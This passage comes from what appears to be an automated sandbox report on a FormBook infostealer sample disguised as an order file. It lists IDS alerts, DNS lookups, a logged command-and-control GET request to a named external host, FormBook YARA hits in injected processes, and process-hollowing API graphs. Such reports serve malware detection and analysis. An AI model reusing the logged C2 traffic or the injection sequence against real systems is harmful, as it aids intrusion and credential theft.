                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:
                            Instruction
                            dec ebp
                            pop edx
                            nop
                            add byte ptr [ebx], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], al
                            add byte ptr [eax], al
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c0000 | 0x10 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1bfc02 | 0x1c | .text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x2000 | 0x1bdc8e | 0x1bde00 | False | 0.39824640366554526 | data | 4.567184281741237 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc | 0x1c0000 | 0x10 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            01/08/23-16:24:08.929621 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            01/08/23-16:24:08.929621 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            01/08/23-16:24:08.929621 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jan 8, 2023 16:24:08.907176018 CET | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            Jan 8, 2023 16:24:08.929352045 CET | 80 | 49698 | 213.239.221.71 | 192.168.2.3
                            Jan 8, 2023 16:24:08.929502010 CET | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            Jan 8, 2023 16:24:08.929620981 CET | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            Jan 8, 2023 16:24:08.952090025 CET | 80 | 49698 | 213.239.221.71 | 192.168.2.3
                            Jan 8, 2023 16:24:08.957961082 CET | 80 | 49698 | 213.239.221.71 | 192.168.2.3
                            Jan 8, 2023 16:24:08.958008051 CET | 80 | 49698 | 213.239.221.71 | 192.168.2.3
                            Jan 8, 2023 16:24:08.958194971 CET | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            Jan 8, 2023 16:24:08.958410025 CET | 49698 | 80 | 192.168.2.3 | 213.239.221.71
                            Jan 8, 2023 16:24:08.980180025 CET | 80 | 49698 | 213.239.221.71 | 192.168.2.3
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jan 8, 2023 16:24:08.849303961 CET | 49977 | 53 | 192.168.2.3 | 8.8.8.8
                            Jan 8, 2023 16:24:08.895353079 CET | 53 | 49977 | 8.8.8.8 | 192.168.2.3
                            Jan 8, 2023 16:24:18.985353947 CET | 57840 | 53 | 192.168.2.3 | 8.8.8.8
                            Jan 8, 2023 16:24:19.005789042 CET | 53 | 57840 | 8.8.8.8 | 192.168.2.3
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Jan 8, 2023 16:24:08.849303961 CET | 192.168.2.3 | 8.8.8.8 | 0x8412 | Standard query (0) | www.ahmedo.ch | A (IP address) | IN (0x0001) | false
                            Jan 8, 2023 16:24:18.985353947 CET | 192.168.2.3 | 8.8.8.8 | 0x2ac9 | Standard query (0) | www.iamme-label.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Jan 8, 2023 16:24:08.895353079 CET | 8.8.8.8 | 192.168.2.3 | 0x8412 | No error (0) | www.ahmedo.ch | | 213.239.221.71 | A (IP address) | IN (0x0001) | false
                            Jan 8, 2023 16:24:19.005789042 CET | 8.8.8.8 | 192.168.2.3 | 0x2ac9 | No error (0) | www.iamme-label.com | iamme-label.com | | CNAME (Canonical name) | IN (0x0001) | false
                            Jan 8, 2023 16:24:19.005789042 CET | 8.8.8.8 | 192.168.2.3 | 0x2ac9 | No error (0) | iamme-label.com | | 81.169.145.80 | A (IP address) | IN (0x0001) | false
                            • www.ahmedo.ch
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.3 | 49698 | 213.239.221.71 | 80 | C:\Windows\explorer.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Jan 8, 2023 16:24:08.929620981 CET | 154 | OUT | GET /dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w== HTTP/1.1
                            Host: www.ahmedo.ch
                            Connection: close
                            Data Raw: 00 00 00 00 00 00 00
                            Data Ascii:
                            Jan 8, 2023 16:24:08.957961082 CET | 154 | IN | HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sun, 08 Jan 2023 15:24:08 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 254
                            Connection: close
                            X-Varnish: 1006141483
                            Retry-After: 5
                            Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 1006141483</p> <hr> <p>Varnish cache server</p> </body></html>


                            Target ID:0
                            Start time:16:23:10
                            Start date:08/01/2023
                            Path:C:\Users\user\Desktop\Order 20233.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\Order 20233.exe
                            Imagebase:0x21772580000
                            File size:1827328 bytes
                            MD5 hash:CFC3542E983B4A7436DABB73132CBBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low

                            Target ID:4
                            Start time:16:23:24
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                            Imagebase:0x1eacc870000
                            File size:54888 bytes
                            MD5 hash:7809A19AA8DA1A41F36B60B0664C4E20
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:6
                            Start time:16:23:29
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                            Imagebase:0x1892c120000
                            File size:42080 bytes
                            MD5 hash:11D8A500C4C0FBAF20EBDB8CDF6EA452
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:7
                            Start time:16:23:29
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
                            Imagebase:0x29ba2ba0000
                            File size:32872 bytes
                            MD5 hash:D91462AE31562E241AF5595BA5E1A3C4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:8
                            Start time:16:23:29
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                            Imagebase:0x1be839a0000
                            File size:24160 bytes
                            MD5 hash:48FD4DD682051712E3E7757C525DED71
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:10
                            Start time:16:23:30
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                            Imagebase:0x7ff651cf0000
                            File size:50784 bytes
                            MD5 hash:3F68BCF536EEAE067038C67022CDF6D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:11
                            Start time:16:23:30
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
                            Imagebase:0x15782f30000
                            File size:126560 bytes
                            MD5 hash:F31014EE4DE7FE48E9B7C9BE94CFB45F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:13
                            Start time:16:23:30
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
                            Imagebase:0x7ff66ccd0000
                            File size:44640 bytes
                            MD5 hash:061D8C0371566D560C5B15C77A34046F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:15
                            Start time:16:23:31
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                            Imagebase:0x7ff7da510000
                            File size:128584 bytes
                            MD5 hash:B00E9325AC7356A3F4864EAAAD48E13F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:16
                            Start time:16:23:31
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
                            Imagebase:0x7ff63bfc0000
                            File size:174184 bytes
                            MD5 hash:FBA5E8D94C9EADC279BC06B9CF041A9A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Target ID:17
                            Start time:16:23:31
                            Start date:08/01/2023
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
                            Imagebase:0xe60000
                            File size:42080 bytes
                            MD5 hash:F2A47587431C466535F3C3D3427724BE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown

                            Target ID:20
                            Start time:16:23:35
                            Start date:08/01/2023
                            Path:C:\Windows\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Explorer.EXE
                            Imagebase:0x7ff69fe90000
                            File size:3933184 bytes
                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                            Target ID:21
                            Start time:16:24:21
                            Start date:08/01/2023
                            Path:C:\Windows\SysWOW64\mstsc.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\mstsc.exe
                            Imagebase:0x1310000
                            File size:3444224 bytes
                            MD5 hash:2412003BE253A515C620CE4890F3D8F3
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group


                              Execution Graph

                              Execution Coverage:14.2%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:28.4%
                              Total number of Nodes:317
                              Total number of Limit Nodes:51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID:
                              • String ID: B^_L$\^_H
                              • API String ID: 0-1834631119
                              • Opcode ID: e7c5c968a5b7786a3f398d975491f4fd50657a0d0c41a2691bc1581189669794
                              • Instruction ID: f5e2097271f3e294c81da9daeda3ee3472ba253819ef0b9e0589d47a9abc5ea8
                              • Opcode Fuzzy Hash: e7c5c968a5b7786a3f398d975491f4fd50657a0d0c41a2691bc1581189669794
                              • Instruction Fuzzy Hash: 72C27C7160DB894FD35ADB38D4814B9B7E1FF99301B0445BED88AC72A6EE34E846C781
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID:
                              • String ID: ]_H$]_H
                              • API String ID: 0-2410564456
                              • Opcode ID: 6216affd5d0d0dcfc61ce8793433fe6d0fc6ab05917944b9467c835c00b9fe9d
                              • Instruction ID: 68884289cbfaae6fa563e617b26eda840429a1a7e06f2d12e7e1e3571d176f05
                              • Opcode Fuzzy Hash: 6216affd5d0d0dcfc61ce8793433fe6d0fc6ab05917944b9467c835c00b9fe9d
                              • Instruction Fuzzy Hash: B7629D7160EF494FE75ADB38C4656B9B7E1FF99310B0401BED48AC7292EE25E846C381
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID:
                              • String ID: Jr_E
                              • API String ID: 0-3104649215
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID:
                              • String ID: fish
                              • API String ID: 0-1064584243
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1182 7ffbad399f90-7ffbad399f97 1183 7ffbad399f99-7ffbad399fa1 1182->1183 1184 7ffbad399fa2-7ffbad39a02a 1182->1184 1183->1184 1188 7ffbad39a034-7ffbad39a079 NtWriteVirtualMemory 1184->1188 1189 7ffbad39a02c-7ffbad39a031 1184->1189 1190 7ffbad39a07b 1188->1190 1191 7ffbad39a081-7ffbad39a0ab 1188->1191 1189->1188 1190->1191
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1233 7ffbad39a538-7ffbad39a5d2 NtResumeThread 1239 7ffbad39a5d4 1233->1239 1240 7ffbad39a5da-7ffbad39a5f6 1233->1240 1239->1240
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1029 7ffbad397ce1-7ffbad397da6 1033 7ffbad397da8-7ffbad397dad 1029->1033 1034 7ffbad397db0-7ffbad397db5 1029->1034 1033->1034 1035 7ffbad397db7-7ffbad397dc7 1034->1035 1036 7ffbad397dcf-7ffbad397dfa 1034->1036 1035->1036 1037 7ffbad397dc9-7ffbad397dcd 1036->1037 1038 7ffbad397dfc-7ffbad397e09 1036->1038 1039 7ffbad397e0c-7ffbad397ee3 CreateProcessW 1037->1039 1038->1039 1041 7ffbad397ee5 1039->1041 1042 7ffbad397eeb-7ffbad397f3f call 7ffbad397f40 1039->1042 1041->1042
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1205 7ffbad381d90-7ffbad381e49 VirtualProtect 1210 7ffbad381e51-7ffbad381e82 1205->1210 1211 7ffbad381e4b 1205->1211 1211->1210
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1192 7ffbad381039-7ffbad38103d 1193 7ffbad381042-7ffbad381051 1192->1193 1194 7ffbad38103f-7ffbad381040 1192->1194 1195 7ffbad381054-7ffbad3810b8 1193->1195 1196 7ffbad381053 1193->1196 1194->1193 1200 7ffbad3810c2-7ffbad3810f4 LoadLibraryW 1195->1200 1201 7ffbad3810ba-7ffbad3810bf 1195->1201 1196->1195 1202 7ffbad3810fc-7ffbad381123 1200->1202 1203 7ffbad3810f6 1200->1203 1201->1200 1203->1202
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1213 7ffbad3980a9-7ffbad39811e 1218 7ffbad398128-7ffbad39815a Wow64SetThreadContext 1213->1218 1219 7ffbad398120-7ffbad398125 1213->1219 1220 7ffbad39815c 1218->1220 1221 7ffbad398162-7ffbad398189 1218->1221 1219->1218 1220->1221
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1222 7ffbad399eb8-7ffbad399ecf 1227 7ffbad399f19-7ffbad399f63 VirtualAllocEx 1222->1227 1228 7ffbad399ed0-7ffbad399f18 1222->1228 1229 7ffbad399f65 1227->1229 1230 7ffbad399f6b-7ffbad399f88 1227->1230 1228->1227 1229->1230
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.319947371.00007FFBAD440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD440000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad440000_Order 20233.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6fb8ba2b79b400766132d9987322480eeb7c96dda043195b1f9632968e3659a
                              • Instruction ID: 51a77941ead384ab9d3ecfab0c96eec42b110d9096f15fbe91b1ddd001e2a6a2
                              • Opcode Fuzzy Hash: b6fb8ba2b79b400766132d9987322480eeb7c96dda043195b1f9632968e3659a
                              • Instruction Fuzzy Hash: B7420AF290E7C60FE757C67898661A47FE1EF5A210F0805FBD4C9CB1A3ED1868568392
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.319947371.00007FFBAD440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD440000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad440000_Order 20233.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99269c5b23089ba6f609c42e794a0024c272f7d21cbfbd5daf053d587d909d20
                              • Instruction ID: 05e4b087e8242d4eef44ef725f33187505ca880ada8f380316da347487d61ebc
                              • Opcode Fuzzy Hash: 99269c5b23089ba6f609c42e794a0024c272f7d21cbfbd5daf053d587d909d20
                              • Instruction Fuzzy Hash: C91127B270DB490FD749DA2CE8515B9B7D1FBD9350F0406AED08AC7243D915A842C386
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.319947371.00007FFBAD440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD440000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad440000_Order 20233.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.319475222.00007FFBAD380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD380000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffbad380000_Order 20233.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:4.5%
                              Dynamic/Decrypted Code Coverage:2.3%
                              Signature Coverage:0.2%
                              Total number of Nodes:652
                              Total number of Limit Nodes:85

                              Control-flow Graph

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                              Strings
                              Memory Dump Source
